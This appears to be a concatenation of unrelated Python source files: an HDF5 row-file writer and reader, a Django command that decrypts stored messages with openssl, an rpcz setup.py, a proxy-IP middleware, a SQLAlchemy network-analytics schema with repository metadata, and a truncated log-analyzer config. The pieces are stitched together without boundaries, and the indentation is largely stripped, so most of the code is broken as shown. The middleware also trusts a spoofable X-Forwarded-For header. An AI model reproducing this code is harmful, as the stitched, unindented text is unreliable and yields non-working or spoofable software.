""" Loads rows from an iterator.
Args:
source (iterator): iterable of rows to load.
"""
spec = getattr(source, 'spec', None)
for i, row in enumerate(iter(source)):
if spec and i < (spec.start_line or 1):
# skip comments and headers. If start_line is empty, assume the first row is the header.
continue
if spec and spec.end_line and i > spec.end_line:
# skip footer
break
self.insert_row(row)
# If the source has a headers property, and it's defined, then
# use it for the headers. This often has to be called after iteration, because
# the source may have the header as the first row
try:
if source.headers:
self.headers = source.headers
except AttributeError:
pass
self._write_rows()
def close(self):
if self._h5_file:
self._write_rows()
self._h5_file.close()
self._h5_file = None
if self.parent:
self.parent._writer = None
def write_file_header(self):
""" Write the version, number of rows and number of cols to the h5 file. """
if 'file_header' in self._h5_file.root.partition:
self._h5_file.remove_node('/partition', 'file_header')
descriptor = {
'version': Int32Col(),
'n_rows': Int32Col(),
'n_cols': Int32Col()
}
table = self._h5_file.create_table(
'/partition', 'file_header',
descriptor, 'Header of the file.')
table.row['version'] = HDFPartition.VERSION
table.row['n_rows'] = self.n_rows
table.row['n_cols'] = self.n_cols
table.row.append()
table.flush()
def set_types(self, ti):
""" Set Types from a type intuiter object. """
results = {int(r['position']): r for r in ti._dump()}
for i in range(len(results)):
for k, v in iteritems(results[i]):
k = {'count': 'type_count'}.get(k, k)
self.column(i + 1)[k] = v
if not self.column(i + 1).type:
self.column(i + 1).type = results[i]['resolved_type']
def set_stats(self, stats):
""" Copy stats into the schema.
Args:
stats (Stats):
"""
for name, stat_set in iteritems(stats.dict):
row = self.column(name)
for k, v in iteritems(stat_set.dict):
k = {'count': 'stat_count'}.get(k, k)
row[k] = v
def set_source_spec(self, spec):
"""Set the metadata coresponding to the SourceSpec, excluding the row spec parts. """
ms = self.meta['source']
ms['url'] = spec.url
ms['fetch_time'] = spec.download_time
ms['file_type'] = spec.filetype
ms['url_type'] = spec.urltype
ms['encoding'] = spec.encoding
me = self.meta['excel']
me['worksheet'] = spec.segment
if spec.columns:
for i, sc in enumerate(spec.columns, 1):
c = self.column(i)
if c.name:
assert sc.name == c.name
c.start = sc.start
c.width = sc.width
def set_row_spec(self, row_spec, headers):
""" Saves row_spec to meta and populates headers.
Args:
row_spec (dict): dict with rows specifications
Example: {
'header_rows': [1,2],
'comment_rows': [0],
'start_row': 3,
'end_row': None,
'data_pattern': ''
}
"""
self.data_start_row = row_spec['start_row']
self.data_end_row = row_spec['end_row']
self.meta['row_spec'] = row_spec
self.headers = [self.header_mangler(h) for h in headers]
self._write_meta()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
if exc_val:
return False
def _validate_groups(self):
""" Checks and creates needded groups in the h5 file. """
if 'partition' not in self._h5_file.root:
self._h5_file.create_group('/', 'partition', 'Partition.')
if 'meta' not in self._h5_file.root.partition:
self._h5_file.create_group('/partition', 'meta', 'Meta information of the partition.')
def _write_rows(self, rows=None):
self._write_meta()
self.write_file_header()
rows, clear_cache = (self.cache, True) if not rows else (rows, False)
if not rows:
return
# convert columns to descriptor
rows_descriptor = _get_rows_descriptor(self.columns)
if 'rows' not in self._h5_file.root.partition:
self._h5_file.create_table(
'/partition', 'rows', rows_descriptor, 'Rows (data) of the partition.')
rows_table = self._h5_file.root.partition.rows
partition_row = rows_table.row
# The h5 colnames order has to match the columns order to provide proper iteration over rows.
assert self.headers == rows_table.colnames
description = [
(col_name, getattr(rows_table.description, col_name)) for col_name in rows_table.colnames]
for row in rows:
for col_name, col_desc in description:
value = _serialize(col_desc.__class__, row[col_desc._v_pos])
if isinstance(value, text_type):
value = value.encode('utf-8')
partition_row[col_name] = value
partition_row.append()
rows_table.flush()
# Hope that the max # of cols is found in the first 100 rows
# FIXME! This won't work if rows is an iterator.
self.n_cols = reduce(max, (len(e) for e in rows[:100]), self.n_cols)
if clear_cache:
self.cache = []
def _write_meta(self):
""" Writes meta to the h5 file. """
assert self.meta['schema'][0] == MPRowsFile.SCHEMA_TEMPLATE
self._validate_groups()
self._save_about()
self._save_comments()
self._save_excel()
self._save_geo()
self._save_row_spec()
self._save_schema()
self._save_source()
def _save_meta_child(self, child, descriptor):
""" Saves given child of the meta to the table with same name to the h5 file.
Args:
child (str): name of the child.
descriptor (dict): descriptor of the table.
"""
# always re-create the table on save. It works better than removing rows.
if child in self._h5_file.root.partition.meta:
self._h5_file.remove_node('/partition/meta', child)
table = self._h5_file.create_table(
'/partition/meta', child,
descriptor, 'meta.{}'.format(child))
row = table.row
for k, v in self.meta[child].items():
if k in ('header_rows', 'comment_rows'):
v = json.dumps(v or '')
row[k] = _serialize(descriptor[k].__class__, v)
row.append()
table.flush()
def _save_about(self):
descriptor = {
'load_time': Float64Col(),
'create_time': Float64Col()
}
self._save_meta_child('about', descriptor)
def _save_schema(self):
""" Saves meta.schema table of the h5 file.
"""
descriptor = {
'pos': Int32Col(),
'name': StringCol(itemsize=255),
'type': StringCol(itemsize=255),
'description': StringCol(itemsize=1024),
'start': Int32Col(),
'width': Int32Col(),
'position': Int32Col(),
'header': StringCol(itemsize=255),
'length': Int32Col(),
'has_codes': BoolCol(),
'type_count': Int32Col(),
'ints': Int32Col(),
'floats': Int32Col(),
'strs': Int32Col(),
'unicode': Int32Col(),
'nones': Int32Col(),
'datetimes': Int32Col(),
'dates': Int32Col(),
'times': Int32Col(),
'strvals': StringCol(itemsize=255),
'flags': StringCol(itemsize=255),
'lom': StringCol(itemsize=1),
'resolved_type': StringCol(itemsize=40),
'stat_count': Int32Col(),
'nuniques': Int32Col(),
'mean': Float64Col(),
'std': Float64Col(),
'min': Float64Col(),
'p25': Float64Col(),
'p50': Float64Col(),
'p75': Float64Col(),
'max': Float64Col(),
'skewness': Float64Col(),
'kurtosis': Float64Col(),
'hist': StringCol(itemsize=255),
'text_hist': StringCol(itemsize=255),
'uvalues': StringCol(itemsize=5000)
}
# always re-create the table on save. It works better than removing rows.
if 'schema' in self._h5_file.root.partition.meta:
self._h5_file.remove_node('/partition/meta', 'schema')
self._h5_file.create_table(
'/partition/meta', 'schema',
descriptor, 'meta.schema',
createparents=True)
schema = self.meta['schema'][0]
table = self._h5_file.root.partition.meta.schema
row = table.row
for col_descr in self.meta['schema'][1:]:
for i, col_name in enumerate(schema):
if col_name in ('hist', 'uvalues'):
value = json.dumps(col_descr[i] or '')
else:
value = _serialize(descriptor[col_name].__class__, col_descr[i])
if isinstance(value, text_type):
value = value.encode('utf-8')
row[col_name] = value
row.append()
table.flush()
def _save_excel(self):
descriptor = {
'worksheet': StringCol(itemsize=255),
'datemode': Int32Col()
}
self._save_meta_child('excel', descriptor)
def _save_comments(self):
descriptor = {
'header': StringCol(itemsize=255),
'footer': StringCol(itemsize=255)
}
self._save_meta_child('comments', descriptor)
def _save_source(self):
descriptor = {
'fetch_time': Float64Col(),
'encoding': StringCol(itemsize=255),
'url': StringCol(itemsize=1024),
'file_type': StringCol(itemsize=50),
'inner_file': StringCol(itemsize=255),
'url_type': StringCol(itemsize=255),
}
self._save_meta_child('source', descriptor)
def _save_row_spec(self):
descriptor = {
'end_row': Int32Col(),
'header_rows': StringCol(itemsize=255), # comma separated ints or empty string.
'start_row': Int32Col(),
'comment_rows': StringCol(itemsize=255), # comma separated ints or empty string.
'data_pattern': StringCol(itemsize=255)
}
self._save_meta_child('row_spec', descriptor)
def _save_geo(self):
descriptor = {
'srs': Int32Col(),
'bb': Int32Col(),
}
self._save_meta_child('geo', descriptor)
class HDFReader(object):
""" Read an h5 file. """
def __init__(self, parent, filename):
""" Reads the filename and prepares for iterating over rows.
Args:
parent (HDFPartition):
filename (str):
"""
if not isinstance(filename, string_types):
# This is the pytables constraint.
raise ValueError(
'HDFReader requires string with filename. Got {} instead.'
.format(filename.__class__))
self.parent = parent
self._h5_file = open_file(filename, mode='r')
self._headers = None
self.pos = 0 # Row position for next read.
self.n_rows = 0
self.n_cols = 0
self.version, self.n_rows, self.n_cols = _get_file_header(self._h5_file.root.partition.file_header)
self._in_iteration = False
self._meta = None
@property
def info(self):
return HDFPartition._info(self)
@property
def meta(self):
if self._meta is None:
self._meta = self._read_meta(self._h5_file)
return self._meta
@property
def columns(self):
""" Returns columns specifications in the ambry_source format. """
return HDFPartition._columns(self)
@property
def headers(self):
""" Returns header (column names).
Returns:
list of str:
"""
return [e.name for e in HDFPartition._columns(self)]
@property
def raw(self):
""" A raw iterator, which ignores the data start and stop rows and returns all rows, as rows. """
try:
if 'rows' not in self._h5_file.root.partition:
# table with rows was not created.
return  # PEP 479: raising StopIteration inside a generator is an error in Python 3.7+
self._in_iteration = True
table = self._h5_file.root.partition.rows
for row in table.iterrows():
yield [row[c] for c in table.colnames]
self.pos += 1
finally:
self._in_iteration = False
self.close()
@property
def rows(self):
""" Iterator for reading rows. """
# For HDF it's exactly the same as raw iterator.
return self.raw
def __iter__(self):
""" Iterator for reading rows as RowProxy objects
WARNING: This routine generates RowProxy objects. RowProxy objects
are reused, so if you construct a list directly from the output from this method,
the list will have multiple copies of a single RowProxy, which will
have as an inner row the last result row. If you are constructing
a list directly, use a getter that extracts the inner row or converts the RowProxy
to a dict.
"""
rp = RowProxy(self.headers)
try:
if 'rows' not in self._h5_file.root.partition:
# rows table was not created.
return  # PEP 479: raising StopIteration inside a generator is an error in Python 3.7+
self._in_iteration = True
table = self._h5_file.root.partition.rows
for row in table.iterrows():
r = [_deserialize(row[c]) for c in table.colnames]
yield rp.set_row(r)
self.pos += 1
finally:
self._in_iteration = False
def select(self, predicate=None, headers=None):
""" Select rows from the reader using a predicate and itemgetter to return a subset of elements.
Args:
predicate (callable, optional): if defined, a callable that is called for each row and,
if it returns true, the row is included in the output.
headers (list, optional): if defined, a list or tuple of header names to return from each row
Returns:
iterable: iterable of results
WARNING: This routine works from the reader iterator, which returns RowProxy objects. RowProxy
objects are reused, so if you construct a list directly from the output from
this method, the list will have multiple copies of a single RowProxy,
which will have as an inner row the last result row. If you are
constructing a list directly, use a getter that extracts the inner row or
converts the RowProxy to a dict:
list(s.datafile.select(lambda r: r.stusab == 'CA', lambda r: r.dict))
"""
if headers:
from operator import itemgetter
ig = itemgetter(*headers)
rp = RowProxy(headers)
getter = lambda r: rp.set_row(ig(r.dict))
else:
getter = None
if getter is not None and predicate is not None:
return six.moves.map(getter, filter(predicate, iter(self)))
elif getter is not None and predicate is None:
return six.moves.map(getter, iter(self))
elif getter is None and predicate is not None:
return six.moves.filter(predicate, self)
else:
return iter(self)
def close(self):
if self._h5_file:
self.meta # In case caller wants to read meta after close.
self._h5_file.close()
self._h5_file = None
if self.parent:
self.parent._reader = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
if exc_val:
return False
@classmethod
def _read_meta(cls, h5_file):
meta = deepcopy(MPRowsFile.META_TEMPLATE)
for child, group in meta.items():
if child == 'schema':
# This is the special case because meta.schema is constructed from many rows.
new_schema = [MPRowsFile.SCHEMA_TEMPLATE]
for col_descr in cls._read_meta_child(h5_file, 'schema'):
col = []
for e in MPRowsFile.SCHEMA_TEMPLATE:
col.append(_deserialize(col_descr.get(e)))
new_schema.append(col)
meta['schema'] = new_schema
else:
# This is the common case, where a child of the meta is constructed from exactly one row.
try:
saved_data = cls._read_meta_child(h5_file, child)
if saved_data:
saved_data = saved_data[0]
else:
saved_data = {}
except NoSuchNodeError:
logger.warning('meta.{} table does not exist. Using default values.'.format(child))
saved_data = {}
for k, default_value in group.items():
meta[child][k] = saved_data.get(k, default_value)
return meta
@classmethod
def _read_meta_child(cls, h5_file, child):
""" Reads all rows from `child` table of h5 file and returns it.
Args:
child (str): name of the table from h5 file.
Returns:
dict:
"""
table = getattr(h5_file.root.partition.meta, child)
ret = []
for row in table.iterrows():
elem = {}
for c in table.colnames:
v = _deserialize(row[c])
if c in ('header_rows', 'comment_rows', 'hist', 'uvalues'):
v = json.loads(v)
elem[c] = v
ret.append(elem)
return ret
def _get_rows_descriptor(columns):
""" Converts columns specifications from ambry_sources format to pytables descriptor.
Args:
columns (list of dict)
Returns:
dict: valid pytables descriptor.
"""
TYPE_MAP = {
'int': lambda pos: Int32Col(pos=pos),
'long': lambda pos: Int64Col(pos=pos),
'str': lambda pos: StringCol(itemsize=255, pos=pos),
'bytes': lambda pos: StringCol(itemsize=255, pos=pos),
'float': lambda pos: Float64Col(pos=pos),
'unknown': lambda pos: StringCol(itemsize=255, pos=pos),
}
descriptor = {}
for column in columns:
pytables_type = TYPE_MAP.get(column['type'])
if not pytables_type:
raise Exception(
'Failed to convert `{}` ambry_sources type to pytables type.'.format(column['type']))
descriptor[column['name']] = pytables_type(column['pos'])
return descriptor
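# Example input/output for _get_rows_descriptor(); the column dicts carry the
# same 'name'/'type'/'pos' fields the schema rows above provide.
def _example_rows_descriptor():
    columns = [
        {'name': 'id', 'type': 'int', 'pos': 0},
        {'name': 'title', 'type': 'str', 'pos': 1},
        {'name': 'score', 'type': 'float', 'pos': 2},
    ]
    # -> {'id': Int32Col(pos=0), 'title': StringCol(itemsize=255, pos=1),
    #     'score': Float64Col(pos=2)}
    return _get_rows_descriptor(columns)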
def _serialize(col_type, value):
""" Converts value to format ready to save to h5 file. """
if col_type == Float64Col:
try:
float(value)
except (TypeError, ValueError):
# it is not a valid float.
value = None
if col_type in (Int32Col, Int64Col):
try:
int(value)
except (TypeError, ValueError):
# it is not a valid int.
value = None
TYPE_MAP = {
Int64Col: MIN_INT64,
Int32Col: MIN_INT32,
Float64Col: float('nan'),
StringCol: '',
}
force = False
if value is None:
force = True
elif isinstance(value, string_types) and value == 'NA':
force = True
if force and col_type in TYPE_MAP:
return TYPE_MAP[col_type]
return value
def _deserialize(value):
""" Converts None replacements stored in the pytables to None. """
if isinstance(value, six.integer_types) and value in (MIN_INT32, MIN_INT64):
return None
elif isinstance(value, float) and math.isnan(value):
return None
elif isinstance(value, binary_type):
return value.decode('utf-8')
return value
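# Round-trip sketch for the None handling above: None (or the string 'NA') is
# stored as a per-type sentinel value and mapped back to None by _deserialize().
def _example_none_round_trip():
    assert _serialize(Int32Col, None) == MIN_INT32
    assert _deserialize(_serialize(Int32Col, None)) is None
    assert _deserialize(_serialize(Int64Col, 'NA')) is None
    assert _deserialize(_serialize(Float64Col, None)) is None  # stored as NaN
    assert _serialize(StringCol, None) == ''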
def _get_file_header(table):
""" Returns tuple with file headers - (version, rows_number, cols_number). """
for row in table.iterrows():
return row['version'], row['n_rows'], row['n_cols']
return (None, 0, 0)
import subprocess
from django.core.management.base import BaseCommand
from django.utils.encoding import force_str
from ngw.core.models import ContactMsg
class Command(BaseCommand):
help = 'Try to decrypt a message with an AES passphrase'
def add_arguments(self, parser):
parser.add_argument('msgid', type=int)
parser.add_argument('aeskey')
def handle(self, *args, **options):
msgid = int(options['msgid'])
passphrase = options['aeskey']
msg = ContactMsg.objects.get(pk=msgid)
msgtext = msg.text.encode('utf-8')
print(msg.text)
cleartext = subprocess.check_output(
['openssl', 'enc', '-aes-256-cbc',
'-pass', 'pass:%s' % passphrase,
'-d', '-base64', '-A'],
input=msgtext)
cleartext = force_str(cleartext)
print(cleartext)
msg.text = cleartext
msg.read_date = None
msg.read_by = None
msg.save()
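# Invocation sketch (the message id and passphrase are placeholder values):
#
#   ./manage.py recover_message 42 'my-aes-passphrase'
#
# The command prints the stored ciphertext and the recovered cleartext, then
# saves the cleartext back to ContactMsg.text with read_date/read_by cleared.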
import os
import shutil
from distutils.command import build as build_module
from setuptools import setup, Command, Extension
import compiler
def _build_rpcz_proto():
compiler.generate_proto('../src/rpcz/proto/rpcz.proto', 'rpcz')
def _build_test_protos():
compiler.generate_proto('../test/proto/search.proto', 'tests')
compiler.generate_proto(
'../test/proto/search.proto', 'tests',
with_plugin='python_rpcz', suffix='_rpcz.py',
plugin_binary=
'../build/src/rpcz/plugin/python/protoc-gen-python_rpcz')
class build(build_module.build):
def run(self):
_build_rpcz_proto()
_build_test_protos()
shutil.copy('compiler.py', 'rpcz')
build_module.build.run(self)
class gen_pyext(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
if os.system('cython --cplus cython/pywraprpcz.pyx') != 0:
raise IOError("Running cython failed.")
setup(
name = "rpcz",
version = "0.9",
author = "Nadav Samet",
author_email = "[email protected]",
description = "An RPC implementation for Protocol Buffer based on ZeroMQ",
license = "Apache 2.0",
keywords = "protocol-buffers rpc zeromq 0mq",
packages=['rpcz', 'tests'],
url='http://code.google.com/p/rpcz/',
long_description='',
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Software Development :: Libraries :: Python Modules",
"License :: OSI Approved :: Apache Software License",
],
cmdclass = {
'build': build,
'gen_pyext': gen_pyext,
},
install_requires=[
'protobuf>=2.5.0',
'pyzmq>=14.3.1'
],
ext_modules=[
Extension("rpcz.pywraprpcz", ["cython/pywraprpcz.cpp"],
extra_compile_args=['-std=c++11'],
libraries=["rpcz"],
include_dirs=['../include', '../build/src'],
library_dirs=['../build/deps/lib', '../build/src/rpcz'],
language='c++')
],
)
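# Build sketch: the custom commands above assume cython is installed and that
# the C++ tree (including protoc-gen-python_rpcz) has already been built under
# ../build, since `build` shells out to both.
#
#   python setup.py gen_pyext   # regenerate cython/pywraprpcz.cpp from the .pyx
#   python setup.py build       # generate *_pb2 / *_rpcz modules, then build as usual
#   python setup.py install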
'''
Created on Dec 20, 2012
@author: rtermondt
'''
class WebFactionFixes(object):
"""Sets 'REMOTE_ADDR' based on 'HTTP_X_FORWARDED_FOR', if the latter is
set.
Based on http://djangosnippets.org/snippets/1706/
"""
def process_request(self, request):
if 'HTTP_X_FORWARDED_FOR' in request.META:
ip = request.META['HTTP_X_FORWARDED_FOR'].split(",")[0].strip()
request.META['REMOTE_ADDR'] = ip
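# To activate this (old-style, pre-MiddlewareMixin) middleware, list it in
# MIDDLEWARE_CLASSES; the dotted path below assumes the module is importable
# as inithub.middleware:
#
#   MIDDLEWARE_CLASSES = (
#       ...,
#       'inithub.middleware.WebFactionFixes',
#   )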
"""
<DefineSource>
@Date : Fri Nov 14 13:20:38 2014 \n
@Author : Erwan Ledoux \n\n
</DefineSource>
A Mobilizer
"""
#<DefineAugmentation>
import ShareYourSystem as SYS
BaseModuleStr="ShareYourSystem.Standards.Walkers.Recruiter"
DecorationModuleStr="ShareYourSystem.Standards.Classors.Classer"
SYS.setSubModule(globals())
#</DefineAugmentation>
#<ImportSpecificModules>
from ShareYourSystem.Standards.Classors import Deriver
from ShareYourSystem.Standards.Noders import Noder
#</ImportSpecificModules>
#<DefineFunctions>
def getMobilizedIsBoolWithParentClassAndDeriveClassesList(
_ParentClass,_DeriveClassesList):
#Debug
print('Mobilizer l.37')
print('_ParentClass is ',_ParentClass)
print('_DeriveClassesList is ',_DeriveClassesList)
print('')
#Return
return any(
map(
lambda __DeriveClass:
Deriver.getIsDerivedBoolWithParentClassAndDeriveClass(
_ParentClass,
__DeriveClass
),
_DeriveClassesList
)
)
#<DefineFunctions>
#<DefineClass>
@DecorationClass()
class MobilizerClass(BaseClass):
#Definition
RepresentingKeyStrsList=[
'MobilizingNameStrsList'
]
def default_init(self,
_MobilizingNameStrsList=None,
_MobilizingCollectionSuffixStr="",
_MobilizedAttestClassesList=None,
**_KwargVariablesDict
):
#Call the parent __init__ method
BaseClass.__init__(self,**_KwargVariablesDict)
def do_mobilize(self):
#Check
if self.VisitingCollectionStrsList==None:
self.VisitingCollectionStrsList=[
self.CollectingCollectionStr
]
#map
self.MobilizedAttestClassesList=map(
SYS.getClassWithNameStr,
self.MobilizingNameStrsList
)
#debug
'''
self.debug(('self.',self,['MobilizedAttestClassesList']))
'''
#append
self.RecruitingConcludeConditionVariable.append(
(
'SelfClass',
getMobilizedIsBoolWithParentClassAndDeriveClassesList,
self.MobilizedAttestClassesList
)
)
#debug
'''
self.debug(('self.',self,['RecruitingConcludeConditionVariable']))
'''
#recruit
self.recruit()
#debug
'''
self.debug(('self.',self,['RecruitedFlatCumulateVariablesList']))
'''
#Split the different names into different collections
map(
lambda __RecruitedFlatCollectVariable:
self.grasp(
__RecruitedFlatCollectVariable
).catch(
__RecruitedFlatCollectVariable.__class__.NameStr+self.MobilizingCollectionSuffixStr,
),
self.RecruitedFlatCumulateVariablesList
)
#</DefineClass>
"""
==========================
Cython-Accelerated Metrics
==========================
:Authors:
Moritz E. Beber
:Date:
2016-04-21
:Copyright:
Copyright |c| 2016, Moritz E. Beber, all rights reserved.
:File:
__init__.py
.. |c| unicode:: U+A9
"""
from __future__ import absolute_import
from .spatial import *
import logging
from sqlalchemy import Table, Column, Integer, String, DateTime, ForeignKey, Float, Numeric, Text
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, relationship
connection_string = ""
Base = declarative_base()
class SampleTimestamp(Base):
__tablename__ = "sample_timestamp"
id = Column(Integer, primary_key=True) # auto increment identifier
timestamp = Column(DateTime(timezone=False))
interval = Column(Numeric)
internet_address_association = Table("internet_address_association", Base.metadata,
Column("node_id", Integer, ForeignKey("node.id")),
Column("address_id", Integer, ForeignKey("internet_address.id")))
class Node(Base):
__tablename__ = "node"
id = Column(Integer, primary_key=True) # auto increment identifier
device_id = Column(String(23), nullable=False, unique=True) # Data path: 00:00:00:00:00:00:00:00
# datetime information
created = Column(DateTime(timezone=False))
last_seen = Column(DateTime(timezone=False))
type = Column(String(50))
connected_since = Column(DateTime(timezone=False))
ports = relationship("Port")
addresses = relationship("InternetAddress", secondary=internet_address_association, backref="nodes")
samples = relationship("NodeSample", backref="node")
# Compare logic http://regebro.wordpress.com/2010/12/13/python-implementing-rich-comparison-the-correct-way/
def _compare(self, other, method):
return method(self.device_id, other.device_id)
def __lt__(self, other):
return self._compare(other, lambda s, o: s < o)
def __le__(self, other):
return self._compare(other, lambda s, o: s <= o)
def __eq__(self, other):
return self._compare(other, lambda s, o: s == o)
def __ge__(self, other):
return self._compare(other, lambda s, o: s >= o)
def __gt__(self, other):
return self._compare(other, lambda s, o: s > o)
def __ne__(self, other):
return self._compare(other, lambda s, o: s != o)
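# With the rich comparisons above, Node instances compare and sort purely by
# their datapath id, e.g. (illustrative values):
#
#   sorted([Node(device_id='00:00:00:00:00:00:00:02'),
#           Node(device_id='00:00:00:00:00:00:00:01')])
#   # -> nodes ordered by device_id, lowest datapath id first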
class NodeSample(Base):
__tablename__ = "node_sample"
id = Column(Integer, primary_key=True) # auto increment identifier
sampled = Column(DateTime(timezone=False))
closeness = Column(Float)
betweenness = Column(Float)
degree = Column(Integer)
node_id = Column(Integer, ForeignKey("node.id"))
class InternetAddress(Base):
__tablename__ = "internet_address"
id = Column(Integer, primary_key=True) # auto increment identifier
created = Column(DateTime(timezone=False))
address = Column(String(50))
class Flow(Base):
__tablename__ = "flow"
id = Column(Integer, primary_key=True) # auto increment identifier
created = Column(DateTime(timezone=False))
cookie = Column(Numeric)
data_layer_destination = Column(String(17))
data_layer_source = Column(String(17))
data_layer_type = Column(Integer)
data_layer_virtual_lan = Column(Numeric)
data_layer_virtual_lan_priority_code_point = Column(Numeric)
input_port = Column(Numeric)
network_destination = Column(String(15))
network_destination_mask_len = Column(Integer)
network_protocol = Column(Integer)
network_source = Column(String(15))
network_source_mask_len = Column(Integer)
network_type_of_service = Column(Integer)
transport_destination = Column(Numeric)
transport_source = Column(Numeric)
wildcards = Column(Numeric)
node_id = Column(Integer, ForeignKey("node.id"))
node = relationship(Node)
samples = relationship("FlowSample", backref="flow")
class FlowSample(Base):
__tablename__ = "flow_sample"
id = Column(Integer, primary_key=True) # auto increment identifier
sampled = Column(DateTime(timezone=False))
packet_count = Column(Integer)
byte_count = Column(Integer)
duration_seconds = Column(Integer)
priority = Column(Numeric)
idle_timeout_sec = Column(Numeric)
hard_timeout_sec = Column(Numeric)
flow_id = Column(Integer, ForeignKey("flow.id"))
class Link(Base):
__tablename__ = "link"
id = Column(Integer, primary_key=True) # auto increment identifier
# datetime information
created = Column(DateTime(timezone=False))
last_seen = Column(DateTime(timezone=False))
direction = Column(String(50))
type = Column(String(50))
# source
src_id = Column(Integer, ForeignKey("node.id"), nullable=False)
src_port = Column(Integer)
src = relationship("Node", foreign_keys=[src_id])
# destination
dst_id = Column(Integer, ForeignKey("node.id"), nullable=False)
dst_port = Column(Integer)
dst = relationship("Node", foreign_keys=[dst_id])
samples = relationship("LinkSample")
class LinkSample(Base):
__tablename__ = "link_sample"
id = Column(Integer, primary_key=True) # auto increment identifier
sampled = Column(DateTime(timezone=False))
betweenness = Column(Float)
src_packet_loss = Column(Float)
dst_packet_loss = Column(Float)
src_transmit_data_rate = Column(Integer)
src_receive_data_rate = Column(Integer)
dst_transmit_data_rate = Column(Integer)
dst_receive_data_rate = Column(Integer)
src_delay = Column(Float)
dst_delay = Column(Float)
link_id = Column(Integer, ForeignKey("link.id"))
link = relationship(Link)
class Port(Base):
__tablename__ = "port"
id = Column(Integer, primary_key=True) # auto increment identifier
hardware_address = Column(String(17), nullable=False) # MAC: 00:00:00:00:00:00
port_number = Column(Integer)
name = Column(String(50))
# datetime information
created = Column(DateTime(timezone=False))
last_seen = Column(DateTime(timezone=False))
samples = relationship("PortSample")
node_id = Column(Integer, ForeignKey("node.id"))
node = relationship(Node)
class PortSample(Base):
__tablename__ = "port_sample"
id = Column(Integer, primary_key=True) # auto increment identifier
sampled = Column(DateTime(timezone=False))
receive_packets = Column(Numeric)
transmit_packets = Column(Numeric)
receive_bytes = Column(Numeric)
transmit_bytes = Column(Numeric)
receive_dropped = Column(Numeric)
transmit_dropped = Column(Numeric)
receive_errors = Column(Numeric)
transmit_errors = Column(Numeric)
receive_frame_errors = Column(Numeric)
receive_overrun_errors = Column(Numeric)
receive_crc_errors = Column(Numeric)
collisions = Column(Numeric)
port_id = Column(Integer, ForeignKey("port.id"))
port = relationship(Port)
class Report(Base):
__tablename__ = "report"
id = Column(Integer, primary_key=True) # auto increment identifier
created = Column(DateTime(timezone=False))
type = Column(String(100))
sample_interval = Column(Numeric)
sample_start = Column(DateTime(timezone=False))
sample_stop = Column(DateTime(timezone=False))
sample_count = Column(Numeric)
execution_duration = Column(Numeric)
content = Column(Text)
def get_session():
engine = create_engine(connection_string)
Base.metadata.bind = engine
session = sessionmaker(bind=engine)()
return session
def start(conn_string):
global connection_string
connection_string = conn_string
def init():
logging.debug("Create store database via ORM.")
engine = create_engine(connection_string)
Base.metadata.create_all(engine)
def drop():
logging.debug("Drop store database via ORM.")
engine = create_engine(connection_string)
    Base.metadata.drop_all(engine)
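# --- Hypothetical usage sketch; not part of the original store module. ---
# The SQLite file path and the datapath id are placeholder values chosen so the
# sketch runs standalone; start(), init(), get_session() and Node come from the
# definitions above.
if __name__ == "__main__":
    from datetime import datetime
    start("sqlite:///sdnalytics_demo.db")  # placeholder DSN; deployments supply their own
    init()                                 # create all tables registered on Base.metadata
    session = get_session()
    node = Node(device_id="00:00:00:00:00:00:00:01",  # placeholder datapath id
                created=datetime.utcnow())
    session.add(node)
    session.commit()
    print(session.query(Node).count())     # -> 1
| {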
"content_hash": "af400703e85e4c9985d3be78e8c1416d",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 112,
"avg_line_length": 30.172549019607843,
"alnum_prop": 0.6785807122433065,
"repo_name": "UdS-TelecommunicationsLab/SDNalytics",
"id": "b61b3c7d7b9c572bbca51c7f4a6df7891c5ffcf0",
"size": "8983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sdnalyzer/store.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "93935"
}
],
"symlink_target": ""
} |
"""module to provide updating installing process function.
.. moduleauthor:: Xiaodong Wang <[email protected]>
"""
import logging
from compass.log_analyzor.line_matcher import LineMatcher, IncrementalProgress
from compass.log_analyzor.file_matcher import FileMatcher
from compass.log_analyzor.adapter_matcher import AdapterMatcher
from compass.log_analyzor.adapter_matcher import AdapterItemMatcher
from compass.log_analyzor.adapter_matcher import OSMatcher
from compass.log_analyzor.adapter_matcher import PackageMatcher
# TODO(weidong): reconsider initialization method for the following.
OS_INSTALLER_CONFIGURATIONS = {
'CentOS': AdapterItemMatcher(
file_matchers=[
FileMatcher(
filename='sys.log',
min_progress=0.0,
max_progress=0.1,
line_matchers={
'start': LineMatcher(
pattern=r'NOTICE (?P<message>.*)',
progress=IncrementalProgress(.1, .9, .1),
message_template='%(message)s',
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='exit'
),
}
),
FileMatcher(
filename='anaconda.log',
min_progress=0.1,
max_progress=1.0,
line_matchers={
'start': LineMatcher(
pattern=r'setting.*up.*kickstart',
progress=.1,
message_template=(
'Setting up kickstart configurations'),
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='STEP_STAGE2'
),
'STEP_STAGE2': LineMatcher(
pattern=r'starting.*STEP_STAGE2',
progress=.15,
message_template=(
'Downloading installation '
'images from server'),
unmatch_nextline_next_matcher_name='STEP_STAGE2',
match_nextline_next_matcher_name='start_anaconda'
),
'start_anaconda': LineMatcher(
pattern=r'Running.*anaconda.*script',
progress=.2,
unmatch_nextline_next_matcher_name=(
'start_anaconda'),
match_nextline_next_matcher_name=(
'start_kickstart_pre')
),
'start_kickstart_pre': LineMatcher(
pattern=r'Running.*kickstart.*pre.*script',
progress=.25,
unmatch_nextline_next_matcher_name=(
'start_kickstart_pre'),
match_nextline_next_matcher_name=(
'kickstart_pre_done')
),
'kickstart_pre_done': LineMatcher(
pattern=(
r'All.*kickstart.*pre.*script.*have.*been.*run'),
progress=.3,
unmatch_nextline_next_matcher_name=(
'kickstart_pre_done'),
match_nextline_next_matcher_name=(
'start_enablefilesystem')
),
'start_enablefilesystem': LineMatcher(
pattern=r'moving.*step.*enablefilesystems',
progress=0.3,
message_template=(
'Performing hard-disk partitioning and '
'enabling filesystems'),
unmatch_nextline_next_matcher_name=(
